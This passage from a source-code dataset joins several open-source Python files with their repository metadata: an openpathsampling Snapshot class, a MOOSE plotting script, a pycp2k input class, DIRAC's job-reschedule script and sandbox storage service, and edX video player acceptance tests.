The standard snapshot for MD, based on statics and kinetics proxies.
"""
StaticContainer = features.StaticContainer
KineticContainer = features.KineticContainer
@staticmethod
def construct(
coordinates=None,
box_vectors=None,
velocities=None,
statics=None,
kinetics=None,
engine=None):
"""
Construct a new snapshot from numpy arrays
This will create the container objects and return a Snapshot object.
Mostly a helper to allow for easier creation.
You can either use coordinates and velocities and/or statics and
kinetics objects. If both are present the more complex (statics
and kinetics) will be used
Parameters
----------
coordinates : numpy.array, shape ``(n_atoms, n_spatial)``
the atomic coordinates
box_vectors : numpy.array, shape ``(n_spatial, n_spatial)``
the box vectors
velocities : numpy.array, shape ``(n_atoms, n_spatial)``
the atomic velocities
statics : `openpathsampling.engines.openmm.StaticContainer`
the statics container if it already exists
kinetics : `openpathsampling.engines.openmm.KineticContainer`
the kinetics container if it already exists
engine : :obj:`openpathsampling.engines.DynamicsEngine`
the engine that should be referenced as the one used to
generate the object
Returns
-------
:obj:`Snapshot`
the created `Snapshot` object
"""
if statics is None:
statics = Snapshot.StaticContainer(
coordinates=coordinates,
box_vectors=box_vectors,
engine=engine
)
if kinetics is None:
kinetics = Snapshot.KineticContainer(
velocities=velocities,
engine=engine
)
return Snapshot(
engine=engine,
statics=statics,
kinetics=kinetics
)
@property
def topology(self):
return self.engine.topology
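# A minimal sketch of building a Snapshot from raw arrays via the helper above
# (n_atoms and engine are assumed to exist; real usage typically attaches
# simtk/openmm units to the arrays):
#
#   import numpy as np
#   snap = Snapshot.construct(
#       coordinates=np.zeros((n_atoms, 3)),
#       box_vectors=np.eye(3) * 3.0,
#       velocities=np.zeros((n_atoms, 3)),
#       engine=engine,
#   )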
|
choderalab/openpathsampling
|
openpathsampling/engines/openmm/snapshot.py
|
Python
|
lgpl-2.1
| 3,134
|
[
"OpenMM"
] |
bcab9ef1da7e0557532ba1f1fea8f829c8159f9016abd520573177bb41f1b3d7
|
#!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
def expected():
ini = 1.0
res = 0.5
lim = 1E-5
lo2 = 0.5 * lim
alpha = (ini - res) / 4.0 / lo2**3
beta = -3.0 * alpha * lo2**2
data = [i*1E-5/100 for i in range(100)]
data = [(x, alpha * (x - lo2)**3 + beta * (x - lo2) + (ini + res) / 2.0) for x in data]
    return list(zip(*data))
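# The cubic above is constructed so the curve equals `ini` at x = 0 and `res` at
# x = lim, with zero slope at both ends; e.g. at x = 0:
#   alpha*(0 - lo2)**3 + beta*(0 - lo2) + (ini + res)/2
#     = 2*alpha*lo2**3 + (ini + res)/2 = (ini - res)/2 + (ini + res)/2 = ini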
def moose():
f = open("gold/small_deform_hard3_update_version.csv")
data = [line.strip().split(",") for line in f.readlines()[2:-1]]
    data = [(float(d[2]), float(d[4])) for d in data]
f.close()
    return list(zip(*data))
plt.figure()
expect = expected()
m = moose()
plt.plot(expect[0], expect[1], 'k-', linewidth = 3.0, label = 'expected')
plt.plot(m[0], m[1], 'k^', label = 'MOOSE')
plt.legend(loc = 'upper right')
plt.xlabel("internal parameter")
plt.ylabel("Tensile strength")
plt.title("Tensile yield with softening")
plt.savefig("small_deform_hard3.pdf")
sys.exit(0)
|
nuclear-wizard/moose
|
modules/tensor_mechanics/test/tests/tensile/small_deform_hard3.py
|
Python
|
lgpl-2.1
| 1,286
|
[
"MOOSE"
] |
2d55797f0a376641c6e96a9ad951fd9901069f769f1fae63f168ce2fc42be020
|
from pycp2k.inputsection import InputSection
class _gaussian1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Ww = None
self.Sigma = None
self._name = "GAUSSIAN"
self._keywords = {'Sigma': 'SIGMA', 'Ww': 'WW'}
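# A minimal, hypothetical sketch of setting the two keywords exposed above
# (within pycp2k this section is normally reached through the generated input
# tree rather than instantiated directly):
#
#   gaussian = _gaussian1()
#   gaussian.Sigma = 0.5
#   gaussian.Ww = 1.0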
|
SINGROUP/pycp2k
|
pycp2k/classes/_gaussian1.py
|
Python
|
lgpl-3.0
| 277
|
[
"Gaussian"
] |
125c4ec4722ae844ff6ab41c3d200289cd000904789ba2ae061efba7f20e1c93
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-job-reschedule
# Author : Stuart Paterson
########################################################################
"""
Reschedule the given DIRAC job
Example:
$ dirac-wms-job-reschedule 1
Rescheduled job 1
"""
import DIRAC
from DIRAC.Core.Base.Script import Script
@Script()
def main():
# Registering arguments will automatically add their description to the help menu
Script.registerArgument(["JobID: DIRAC Job ID"])
_, args = Script.parseCommandLine(ignoreErrors=True)
from DIRAC.Interfaces.API.Dirac import Dirac, parseArguments
dirac = Dirac()
exitCode = 0
errorList = []
result = dirac.rescheduleJob(parseArguments(args))
if result["OK"]:
print("Rescheduled job %s" % ",".join([str(j) for j in result["Value"]]))
else:
errorList.append((result["Value"][-1], result["Message"]))
print(result["Message"])
exitCode = 2
for error in errorList:
print("ERROR %s: %s" % error)
DIRAC.exit(exitCode)
if __name__ == "__main__":
main()
|
DIRACGrid/DIRAC
|
src/DIRAC/Interfaces/scripts/dirac_wms_job_reschedule.py
|
Python
|
gpl-3.0
| 1,157
|
[
"DIRAC"
] |
0db1a5a5717cb327a951b59b77de05744d03d7637b31f1fd22270926ef8807b9
|
""" SandboxHandler is the implementation of the Sandbox service
in the DISET framework
"""
__RCSID__ = "$Id$"
import os
import time
import threading
import tempfile
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.File import mkDir
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Security import Locations, Properties, X509Certificate
from DIRAC.WorkloadManagementSystem.DB.SandboxMetadataDB import SandboxMetadataDB
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.DataManagementSystem.Service.StorageElementHandler import getDiskSpace
from DIRAC.RequestManagementSystem.Client.ReqClient import ReqClient
from DIRAC.RequestManagementSystem.Client.Request import Request
from DIRAC.RequestManagementSystem.Client.Operation import Operation
from DIRAC.RequestManagementSystem.Client.File import File
from DIRAC.Resources.Storage.StorageElement import StorageElement
sandboxDB = False
def initializeSandboxStoreHandler(serviceInfo):
global sandboxDB
sandboxDB = SandboxMetadataDB()
return S_OK()
class SandboxStoreHandler(RequestHandler):
__purgeCount = -1
__purgeLock = threading.Lock()
__purgeWorking = False
def initialize(self):
self.__backend = self.getCSOption("Backend", "local")
self.__localSEName = self.getCSOption("LocalSE", "SandboxSE")
self.__maxUploadBytes = self.getCSOption("MaxSandboxSizeMiB", 10) * 1048576
if self.__backend.lower() == "local" or self.__backend == self.__localSEName:
self.__useLocalStorage = True
self.__seNameToUse = self.__localSEName
else:
self.__useLocalStorage = False
self.__externalSEName = self.__backend
self.__seNameToUse = self.__backend
# Execute the purge once every 1000 calls
SandboxStoreHandler.__purgeCount += 1
if SandboxStoreHandler.__purgeCount > self.getCSOption("QueriesBeforePurge", 1000):
SandboxStoreHandler.__purgeCount = 0
if SandboxStoreHandler.__purgeCount == 0:
threading.Thread(target=self.purgeUnusedSandboxes).start()
# We need the hostDN used in order to pass these credentials to the
# SandboxStoreDB..
hostCertLocation, _ = Locations.getHostCertificateAndKeyLocation()
hostCert = X509Certificate.X509Certificate()
hostCert.loadFromFile(hostCertLocation)
self.hostDN = hostCert.getSubjectDN().get('Value')
def __getSandboxPath(self, md5):
""" Generate the sandbox path
"""
# prefix = self.getCSOption( "SandboxPrefix", "SandBox" )
prefix = "SandBox"
credDict = self.getRemoteCredentials()
if Properties.JOB_SHARING in credDict['properties']:
idField = credDict['group']
else:
idField = "%s.%s" % (credDict['username'], credDict['group'])
pathItems = ["/", prefix, idField[0], idField]
pathItems.extend([md5[0:3], md5[3:6], md5])
return os.path.join(*pathItems)
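  # A worked example of the layout produced above: for username 'alice', group
  # 'dirac_user' (no JOB_SHARING property) and hash 'abcdef0123456789', the
  # generated path is /SandBox/a/alice.dirac_user/abc/def/abcdef0123456789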
def transfer_fromClient(self, fileId, token, fileSize, fileHelper):
"""
Receive a file as a sandbox
"""
if self.__maxUploadBytes and fileSize > self.__maxUploadBytes:
fileHelper.markAsTransferred()
return S_ERROR("Sandbox is too big. Please upload it to a grid storage element")
if isinstance(fileId, (list, tuple)):
if len(fileId) > 1:
assignTo = fileId[1]
fileId = fileId[0]
else:
return S_ERROR("File identified tuple has to have length greater than 1")
else:
assignTo = {}
extPos = fileId.find(".tar")
if extPos > -1:
extension = fileId[extPos + 1:]
aHash = fileId[:extPos]
else:
extension = ""
aHash = fileId
gLogger.info("Upload requested for %s [%s]" % (aHash, extension))
credDict = self.getRemoteCredentials()
sbPath = self.__getSandboxPath("%s.%s" % (aHash, extension))
# Generate the location
result = self.__generateLocation(sbPath)
if not result['OK']:
return result
seName, sePFN = result['Value']
result = sandboxDB.getSandboxId(seName, sePFN, credDict['username'], credDict['group'])
if result['OK']:
gLogger.info("Sandbox already exists. Skipping upload")
fileHelper.markAsTransferred()
sbURL = "SB:%s|%s" % (seName, sePFN)
assignTo = dict([(key, [(sbURL, assignTo[key])]) for key in assignTo])
result = self.export_assignSandboxesToEntities(assignTo)
if not result['OK']:
return result
return S_OK(sbURL)
if self.__useLocalStorage:
hdPath = self.__sbToHDPath(sbPath)
else:
hdPath = False
# Write to local file
result = self.__networkToFile(fileHelper, hdPath)
if not result['OK']:
gLogger.error("Error while receiving sandbox file", "%s" % result['Message'])
return result
hdPath = result['Value']
gLogger.info("Wrote sandbox to file %s" % hdPath)
# Check hash!
if fileHelper.getHash() != aHash:
self.__secureUnlinkFile(hdPath)
gLogger.error("Hashes don't match! Client defined hash is different with received data hash!")
return S_ERROR("Hashes don't match!")
# If using remote storage, copy there!
if not self.__useLocalStorage:
gLogger.info("Uploading sandbox to external storage")
result = self.__copyToExternalSE(hdPath, sbPath)
self.__secureUnlinkFile(hdPath)
if not result['OK']:
return result
sbPath = result['Value'][1]
# Register!
gLogger.info("Registering sandbox in the DB with", "SB:%s|%s" % (self.__seNameToUse, sbPath))
result = sandboxDB.registerAndGetSandbox(credDict['username'], credDict['DN'], credDict['group'],
self.__seNameToUse, sbPath, fileHelper.getTransferedBytes())
if not result['OK']:
self.__secureUnlinkFile(hdPath)
return result
sbURL = "SB:%s|%s" % (self.__seNameToUse, sbPath)
assignTo = dict([(key, [(sbURL, assignTo[key])]) for key in assignTo])
result = self.export_assignSandboxesToEntities(assignTo)
if not result['OK']:
return result
return S_OK(sbURL)
def transfer_bulkFromClient(self, fileId, token, _fileSize, fileHelper):
""" Receive files packed into a tar archive by the fileHelper logic.
token is used for access rights confirmation.
"""
result = self.__networkToFile(fileHelper)
if not result['OK']:
return result
    tmpFilePath = result['Value']
gLogger.info("Got Sandbox to local storage", tmpFilePath)
extension = fileId[fileId.find(".tar") + 1:]
sbPath = "%s.%s" % (self.__getSandboxPath(fileHelper.getHash()), extension)
gLogger.info("Sandbox path will be", sbPath)
# Generate the location
result = self.__generateLocation(sbPath)
if not result['OK']:
return result
seName, sePFN = result['Value']
# Register in DB
credDict = self.getRemoteCredentials()
result = sandboxDB.getSandboxId(seName, sePFN, credDict['username'], credDict['group'])
if result['OK']:
return S_OK("SB:%s|%s" % (seName, sePFN))
result = sandboxDB.registerAndGetSandbox(credDict['username'], credDict['DN'], credDict['group'],
seName, sePFN, fileHelper.getTransferedBytes())
if not result['OK']:
self.__secureUnlinkFile(tmpFilePath)
return result
sbid, _newSandbox = result['Value']
gLogger.info("Registered in DB", "with SBId %s" % sbid)
result = self.__moveToFinalLocation(tmpFilePath, sbPath)
self.__secureUnlinkFile(tmpFilePath)
if not result['OK']:
gLogger.error("Could not move sandbox to final destination", result['Message'])
return result
gLogger.info("Moved to final destination")
# Unlink temporal file if it's there
self.__secureUnlinkFile(tmpFilePath)
return S_OK("SB:%s|%s" % (seName, sePFN))
def __generateLocation(self, sbPath):
"""
Generate the location string
"""
if self.__useLocalStorage:
return S_OK((self.__localSEName, sbPath))
# It's external storage
storageElement = StorageElement(self.__externalSEName)
res = storageElement.isValid()
if not res['OK']:
errStr = "Failed to instantiate destination StorageElement"
gLogger.error(errStr, self.__externalSEName)
return S_ERROR(errStr)
result = storageElement.getURL(sbPath)
if not result['OK'] or sbPath not in result['Value']['Successful']:
errStr = "Failed to generate PFN"
gLogger.error(errStr, self.__externalSEName)
return S_ERROR(errStr)
destPfn = result['Value']['Successful'][sbPath]
return S_OK((self.__externalSEName, destPfn))
def __sbToHDPath(self, sbPath):
while sbPath and sbPath[0] == "/":
sbPath = sbPath[1:]
basePath = self.getCSOption("BasePath", "/opt/dirac/storage/sandboxes")
return os.path.join(basePath, sbPath)
def __networkToFile(self, fileHelper, destFileName=False):
"""
Dump incoming network data to temporal file
"""
tfd = None
if not destFileName:
try:
tfd, destFileName = tempfile.mkstemp(prefix="DSB.")
        # keep the raw descriptor open; it is wrapped into a file object below
except Exception as e:
gLogger.error("%s" % repr(e).replace(',)', ')'))
return S_ERROR("Cannot create temporary file")
destFileName = os.path.realpath(destFileName)
mkDir(os.path.dirname(destFileName))
try:
      if tfd is not None:
        # mkstemp returns a raw OS file descriptor; wrap it so it can be written and closed
        fd = os.fdopen(tfd, "wb")
else:
fd = open(destFileName, "wb")
result = fileHelper.networkToDataSink(fd, maxFileSize=self.__maxUploadBytes)
fd.close()
except Exception as e:
gLogger.error("Cannot open to write destination file", "%s: %s" % (destFileName, repr(e).replace(',)', ')')))
return S_ERROR("Cannot open to write destination file")
if not result['OK']:
return result
return S_OK(destFileName)
def __secureUnlinkFile(self, filePath):
try:
os.unlink(filePath)
except Exception as e:
gLogger.warn("Could not unlink file %s: %s" % (filePath, repr(e).replace(',)', ')')))
return False
return True
def __moveToFinalLocation(self, localFilePath, sbPath):
if self.__useLocalStorage:
hdFilePath = self.__sbToHDPath(sbPath)
result = S_OK((self.__localSEName, sbPath))
if os.path.isfile(hdFilePath):
gLogger.info("There was already a sandbox with that name, skipping copy", sbPath)
else:
hdDirPath = os.path.dirname(hdFilePath)
mkDir(hdDirPath)
try:
os.rename(localFilePath, hdFilePath)
except OSError as e:
errMsg = "Cannot move temporal file to final path"
gLogger.error(errMsg, repr(e).replace(',)', ')'))
result = S_ERROR(errMsg)
else:
result = self.__copyToExternalSE(localFilePath, sbPath)
return result
def __copyToExternalSE(self, localFilePath, sbPath):
"""
Copy uploaded file to external SE
"""
try:
dm = DataManager()
result = dm.put(sbPath, localFilePath, self.__externalSEName)
if not result['OK']:
return result
if 'Successful' not in result['Value']:
gLogger.verbose("Oops, no successful transfers there", str(result))
return S_ERROR("RM returned OK to the action but no successful transfers were there")
okTrans = result['Value']['Successful']
if sbPath not in okTrans:
gLogger.verbose("Ooops, SB transfer wasn't in the successful ones", str(result))
return S_ERROR("RM returned OK to the action but SB transfer wasn't in the successful ones")
return S_OK((self.__externalSEName, okTrans[sbPath]))
except Exception as e:
gLogger.error("Error while moving sandbox to SE", "%s" % repr(e).replace(',)', ')'))
return S_ERROR("Error while moving sandbox to SE")
##################
# Assigning sbs to jobs
types_assignSandboxesToEntities = [dict]
def export_assignSandboxesToEntities(self, enDict, ownerName="", ownerGroup="", entitySetup=False):
"""
Assign sandboxes to jobs.
Expects a dict of { entityId : [ ( SB, SBType ), ... ] }
"""
if not entitySetup:
entitySetup = self.serviceInfoDict['clientSetup']
credDict = self.getRemoteCredentials()
return sandboxDB.assignSandboxesToEntities(enDict, credDict['username'], credDict['group'], entitySetup,
ownerName, ownerGroup)
##################
# Unassign sbs to jobs
types_unassignEntities = [(list, tuple)]
def export_unassignEntities(self, entitiesList, entitiesSetup=False):
"""
Unassign a list of jobs
"""
if not entitiesSetup:
entitiesSetup = self.serviceInfoDict['clientSetup']
credDict = self.getRemoteCredentials()
return sandboxDB.unassignEntities({entitiesSetup: entitiesList}, credDict['username'], credDict['group'])
##################
# Getting assigned sandboxes
types_getSandboxesAssignedToEntity = [basestring]
def export_getSandboxesAssignedToEntity(self, entityId, entitySetup=False):
"""
Get the sandboxes associated to a job and the association type
"""
if not entitySetup:
entitySetup = self.serviceInfoDict['clientSetup']
credDict = self.getRemoteCredentials()
result = sandboxDB.getSandboxesAssignedToEntity(entityId, entitySetup,
credDict['username'], credDict['group'])
if not result['OK']:
return result
sbDict = {}
for SEName, SEPFN, SBType in result['Value']: # pylint: disable=invalid-name
if SBType not in sbDict:
sbDict[SBType] = []
sbDict[SBType].append("SB:%s|%s" % (SEName, SEPFN))
return S_OK(sbDict)
##################
# Disk space left management
types_getFreeDiskSpace = []
def export_getFreeDiskSpace(self):
""" Get the free disk space of the storage element
If no size is specified, terabytes will be used by default.
"""
return getDiskSpace(self.getCSOption("BasePath", "/opt/dirac/storage/sandboxes"))
types_getTotalDiskSpace = []
def export_getTotalDiskSpace(self):
""" Get the total disk space of the storage element
If no size is specified, terabytes will be used by default.
"""
return getDiskSpace(self.getCSOption("BasePath", "/opt/dirac/storage/sandboxes"), total=True)
##################
# Download sandboxes
def transfer_toClient(self, fileID, token, fileHelper):
""" Method to send files to clients.
fileID is the local file name in the SE.
token is used for access rights confirmation.
"""
credDict = self.getRemoteCredentials()
serviceURL = self.serviceInfoDict['URL']
filePath = fileID.replace(serviceURL, '')
result = sandboxDB.getSandboxId(self.__localSEName, filePath, credDict['username'], credDict['group'])
if not result['OK']:
return result
sbId = result['Value']
sandboxDB.accessedSandboxById(sbId)
# If it's a local file
hdPath = self.__sbToHDPath(filePath)
if not os.path.isfile(hdPath):
return S_ERROR("Sandbox does not exist")
result = fileHelper.getFileDescriptor(hdPath, 'rb')
if not result['OK']:
return S_ERROR('Failed to get file descriptor: %s' % result['Message'])
fd = result['Value']
result = fileHelper.FDToNetwork(fd)
fileHelper.oFile.close()
return result
##################
# Purge sandboxes
def purgeUnusedSandboxes(self):
# If a purge is already working skip
SandboxStoreHandler.__purgeLock.acquire()
try:
if SandboxStoreHandler.__purgeWorking:
if time.time() - SandboxStoreHandler.__purgeWorking < 86400:
gLogger.info("Sandbox purge still working")
return S_OK()
SandboxStoreHandler.__purgeWorking = time.time()
finally:
SandboxStoreHandler.__purgeLock.release()
gLogger.info("Purging sandboxes")
result = sandboxDB.getUnusedSandboxes()
if not result['OK']:
gLogger.error("Error while retrieving sandboxes to purge", result['Message'])
SandboxStoreHandler.__purgeWorking = False
return result
sbList = result['Value']
gLogger.info("Got sandboxes to purge", "(%d)" % len(sbList))
for sbId, SEName, SEPFN in sbList: # pylint: disable=invalid-name
self.__purgeSandbox(sbId, SEName, SEPFN)
SandboxStoreHandler.__purgeWorking = False
return S_OK()
def __purgeSandbox(self, sbId, SEName, SEPFN):
result = self.__deleteSandboxFromBackend(SEName, SEPFN)
if not result['OK']:
gLogger.error("Cannot delete sandbox from backend", result['Message'])
return
result = sandboxDB.deleteSandboxes([sbId])
if not result['OK']:
gLogger.error("Cannot delete sandbox from DB", result['Message'])
def __deleteSandboxFromBackend(self, SEName, SEPFN):
gLogger.info("Purging sandbox" "SB:%s|%s" % (SEName, SEPFN))
if SEName != self.__localSEName:
return self.__deleteSandboxFromExternalBackend(SEName, SEPFN)
else:
hdPath = self.__sbToHDPath(SEPFN)
try:
if not os.path.isfile(hdPath):
return S_OK()
except Exception as e:
gLogger.error("Cannot perform isfile", "%s : %s" % (hdPath, repr(e).replace(',)', ')')))
return S_ERROR("Error checking %s" % hdPath)
try:
os.unlink(hdPath)
except Exception as e:
gLogger.error("Cannot delete local sandbox", "%s : %s" % (hdPath, repr(e).replace(',)', ')')))
while hdPath:
hdPath = os.path.dirname(hdPath)
gLogger.info("Checking if dir is empty", hdPath)
try:
if not os.path.isdir(hdPath):
break
if os.listdir(hdPath):
break
gLogger.info("Trying to clean dir", hdPath)
# Empty dir!
os.rmdir(hdPath)
except Exception as e:
gLogger.error("Cannot clean directory", "%s : %s" % (hdPath, repr(e).replace(',)', ')')))
break
return S_OK()
def __deleteSandboxFromExternalBackend(self, SEName, SEPFN):
if self.getCSOption("DelayedExternalDeletion", True):
gLogger.info("Setting deletion request")
try:
# use the host authentication to fetch the data
result = sandboxDB.getSandboxOwner(SEName, SEPFN, self.hostDN, 'hosts')
if not result['OK']:
return result
_owner, ownerDN, ownerGroup = result['Value']
request = Request()
request.RequestName = "RemoteSBDeletion:%s|%s:%s" % (SEName, SEPFN, time.time())
request.OwnerDN = ownerDN
request.OwnerGroup = ownerGroup
physicalRemoval = Operation()
physicalRemoval.Type = "PhysicalRemoval"
physicalRemoval.TargetSE = SEName
fileToRemove = File()
fileToRemove.PFN = SEPFN
physicalRemoval.addFile(fileToRemove)
request.addOperation(physicalRemoval)
return ReqClient().putRequest(request)
except Exception as e:
gLogger.exception("Exception while setting deletion request")
return S_ERROR("Cannot set deletion request: %s" % str(e))
else:
gLogger.info("Deleting external Sandbox")
try:
return StorageElement(SEName).removeFile(SEPFN)
except Exception as e:
gLogger.exception("RM raised an exception while trying to delete a remote sandbox")
return S_ERROR("RM raised an exception while trying to delete a remote sandbox")
|
andresailer/DIRAC
|
WorkloadManagementSystem/Service/SandboxStoreHandler.py
|
Python
|
gpl-3.0
| 19,330
|
[
"DIRAC"
] |
250eedfded71af5e1020270cce21aa7d84525e4cc11ab3ee68b7f4c3862cf812
|
# -*- coding: utf-8 -*-
"""
Acceptance tests for Video.
"""
import os
from unittest import skipIf
from ddt import data, ddt, unpack
from mock import patch
from nose.plugins.attrib import attr
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.course_info import CourseInfoPage
from common.test.acceptance.pages.lms.courseware import CoursewarePage
from common.test.acceptance.pages.lms.tab_nav import TabNavPage
from common.test.acceptance.pages.lms.video.video import VideoPage
from common.test.acceptance.tests.helpers import (
UniqueCourseTest,
YouTubeStubConfig,
is_youtube_available,
skip_if_browser
)
VIDEO_SOURCE_PORT = 8777
VIDEO_HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', 'localhost')
HTML5_SOURCES = [
'http://{}:{}/gizmo.mp4'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
'http://{}:{}/gizmo.webm'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
'http://{}:{}/gizmo.ogv'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
]
HTML5_SOURCES_INCORRECT = [
'http://{}:{}/gizmo.mp99'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
]
HLS_SOURCES = [
'http://{}:{}/hls/history.m3u8'.format(VIDEO_HOSTNAME, VIDEO_SOURCE_PORT),
]
@skipIf(is_youtube_available() is False, 'YouTube is not available!')
class VideoBaseTest(UniqueCourseTest):
"""
Base class for tests of the Video Player
Sets up the course and provides helper functions for the Video tests.
"""
def setUp(self):
"""
Initialization of pages and course fixture for video tests
"""
super(VideoBaseTest, self).setUp()
self.longMessage = True # pylint: disable=invalid-name
self.video = VideoPage(self.browser)
self.tab_nav = TabNavPage(self.browser)
self.courseware_page = CoursewarePage(self.browser, self.course_id)
self.course_info_page = CourseInfoPage(self.browser, self.course_id)
self.auth_page = AutoAuthPage(self.browser, course_id=self.course_id)
self.course_fixture = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
self.metadata = None
self.assets = []
self.contents_of_verticals = None
self.youtube_configuration = {}
self.user_info = {}
# reset youtube stub server
self.addCleanup(YouTubeStubConfig.reset)
def navigate_to_video(self):
""" Prepare the course and get to the video and render it """
self._install_course_fixture()
self._navigate_to_courseware_video_and_render()
def navigate_to_video_no_render(self):
"""
        Prepare the course and get to the video unit,
        but do not wait for it to render, because
        there has been an error.
"""
self._install_course_fixture()
self._navigate_to_courseware_video_no_render()
def _install_course_fixture(self):
""" Install the course fixture that has been defined """
if self.assets:
self.course_fixture.add_asset(self.assets)
chapter_sequential = XBlockFixtureDesc('sequential', 'Test Section')
chapter_sequential.add_children(*self._add_course_verticals())
chapter = XBlockFixtureDesc('chapter', 'Test Chapter').add_children(chapter_sequential)
self.course_fixture.add_children(chapter)
self.course_fixture.install()
if len(self.youtube_configuration) > 0:
YouTubeStubConfig.configure(self.youtube_configuration)
def _add_course_verticals(self):
"""
Create XBlockFixtureDesc verticals
:return: a list of XBlockFixtureDesc
"""
xblock_verticals = []
_contents_of_verticals = self.contents_of_verticals
# Video tests require at least one vertical with a single video.
if not _contents_of_verticals:
_contents_of_verticals = [[{'display_name': 'Video', 'metadata': self.metadata}]]
for vertical_index, vertical in enumerate(_contents_of_verticals):
xblock_verticals.append(self._create_single_vertical(vertical, vertical_index))
return xblock_verticals
def _create_single_vertical(self, vertical_contents, vertical_index):
"""
Create a single course vertical of type XBlockFixtureDesc with category `vertical`.
A single course vertical can contain single or multiple video modules.
:param vertical_contents: a list of items for the vertical to contain
:param vertical_index: index for the vertical display name
:return: XBlockFixtureDesc
"""
xblock_course_vertical = XBlockFixtureDesc('vertical', 'Test Vertical-{0}'.format(vertical_index))
for video in vertical_contents:
xblock_course_vertical.add_children(
XBlockFixtureDesc('video', video['display_name'], metadata=video.get('metadata')))
return xblock_course_vertical
def _navigate_to_courseware_video(self):
""" Register for the course and navigate to the video unit """
self.auth_page.visit()
self.user_info = self.auth_page.user_info
self.courseware_page.visit()
def _navigate_to_courseware_video_and_render(self):
""" Wait for the video player to render """
self._navigate_to_courseware_video()
self.video.wait_for_video_player_render()
def _navigate_to_courseware_video_no_render(self):
""" Wait for the video Xmodule but not for rendering """
self._navigate_to_courseware_video()
self.video.wait_for_video_class()
def metadata_for_mode(self, player_mode, additional_data=None):
"""
Create a dictionary for video player configuration according to `player_mode`
:param player_mode (str): Video player mode
:param additional_data (dict): Optional additional metadata.
:return: dict
"""
metadata = {}
youtube_ids = {
'youtube_id_1_0': '',
'youtube_id_0_75': '',
'youtube_id_1_25': '',
'youtube_id_1_5': '',
}
if player_mode == 'html5':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HTML5_SOURCES
})
if player_mode == 'youtube_html5':
metadata.update({
'html5_sources': HTML5_SOURCES,
})
if player_mode == 'youtube_html5_unsupported_video':
metadata.update({
'html5_sources': HTML5_SOURCES_INCORRECT
})
if player_mode == 'html5_unsupported_video':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HTML5_SOURCES_INCORRECT
})
if player_mode == 'hls':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HLS_SOURCES,
})
if player_mode == 'html5_and_hls':
metadata.update(youtube_ids)
metadata.update({
'html5_sources': HTML5_SOURCES + HLS_SOURCES,
})
if additional_data:
metadata.update(additional_data)
return metadata
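    # A minimal sketch of how the helper above is typically combined with
    # navigate_to_video() in the tests below ('html5' clears the YouTube ids and
    # points html5_sources at the stub server defined at module level):
    #
    #   self.metadata = self.metadata_for_mode('html5', additional_data={'sub': '3_yD_cEKoCk'})
    #   self.navigate_to_video()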
def go_to_sequential_position(self, position):
"""
Navigate to sequential specified by `video_display_name`
"""
self.courseware_page.go_to_sequential_position(position)
self.video.wait_for_video_player_render()
@attr(shard=13)
@ddt
class YouTubeVideoTest(VideoBaseTest):
""" Test YouTube Video Player """
def test_youtube_video_rendering_wo_html5_sources(self):
"""
Scenario: Video component is rendered in the LMS in Youtube mode without HTML5 sources
Given the course has a Video component in "Youtube" mode
Then the video has rendered in "Youtube" mode
"""
self.navigate_to_video()
# Verify that video has rendered in "Youtube" mode
self.assertTrue(self.video.is_video_rendered('youtube'))
def test_transcript_button_wo_english_transcript(self):
"""
Scenario: Transcript button works correctly w/o english transcript in Youtube mode
Given the course has a Video component in "Youtube" mode
And I have defined a non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I see the correct text in the captions
"""
data = {'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('youtube', data)
self.assets.append('chinese_transcripts.srt')
self.navigate_to_video()
self.video.show_captions()
# Verify that we see "好 各位同学" text in the transcript
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_cc_button(self):
"""
Scenario: CC button works correctly with transcript in YouTube mode
Given the course has a video component in "Youtube" mode
And I have defined a transcript for the video
Then I see the closed captioning element over the video
"""
data = {'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('youtube', data)
self.assets.append('chinese_transcripts.srt')
self.navigate_to_video()
# Show captions and make sure they're visible and cookie is set
self.video.show_closed_captions()
self.video.wait_for_closed_captions()
self.assertTrue(self.video.is_closed_captions_visible)
self.video.reload_page()
self.assertTrue(self.video.is_closed_captions_visible)
# Hide captions and make sure they're hidden and cookie is unset
self.video.hide_closed_captions()
self.video.wait_for_closed_captions_to_be_hidden()
self.video.reload_page()
self.video.wait_for_closed_captions_to_be_hidden()
def test_transcript_button_transcripts_and_sub_fields_empty(self):
"""
Scenario: Transcript button works correctly if transcripts and sub fields are empty,
but transcript file exists in assets (Youtube mode of Video component)
Given the course has a Video component in "Youtube" mode
And I have uploaded a .srt.sjson file to assets
Then I see the correct english text in the captions
"""
self._install_course_fixture()
self.course_fixture.add_asset(['subs_3_yD_cEKoCk.srt.sjson'])
self.course_fixture._upload_assets()
self._navigate_to_courseware_video_and_render()
self.video.show_captions()
# Verify that we see "Welcome to edX." text in the captions
self.assertIn('Welcome to edX.', self.video.captions_text)
def test_transcript_button_hidden_no_translations(self):
"""
Scenario: Transcript button is hidden if no translations
Given the course has a Video component in "Youtube" mode
Then the "Transcript" button is hidden
"""
self.navigate_to_video()
